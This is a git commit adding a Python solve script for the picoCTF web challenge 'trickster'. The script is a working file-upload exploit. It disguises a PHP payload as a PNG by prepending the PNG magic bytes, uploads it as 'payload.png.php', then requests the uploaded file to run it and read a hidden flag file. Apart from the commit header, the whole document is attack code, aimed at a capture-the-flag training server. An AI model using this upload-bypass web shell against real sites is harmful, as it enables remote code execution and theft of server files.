web/trickster

2024-09-05 19:54:46 +02:00 · 2024-09-05 19:54:46 +02:00 · 20a447923a
parent 147cc5ec57
commit 20a447923a
1 changed files with 31 additions and 0 deletions
--- a/web/trickster/solve.py
+++ b/web/trickster/solve.py
@ -0,0 +1,31 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -i python3 -p python3 python3Packages.requests
+
+import requests
+
+BASE_URL = "http://atlas.picoctf.net:65066"
+
+def main():
+    PNG_HEADER = bytes([0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A])
+    payload =  PNG_HEADER + b'''
+    <?php
+      echo(file_get_contents("../GQ4DOOBVMMYGK.txt"))
+    ?>
+    '''
+
+    requests.post(
+        BASE_URL + "/",
+        files = {
+            'file': ('payload.png.php', payload),
+            'submit': 'Upload File',
+        }
+    )
+
+    # Found through /robots.txt
+    res = requests.get(BASE_URL + "/uploads/payload.png.php")
+
+    print(res)
+    print(res.text)
+
+if __name__ == '__main__':
+    main()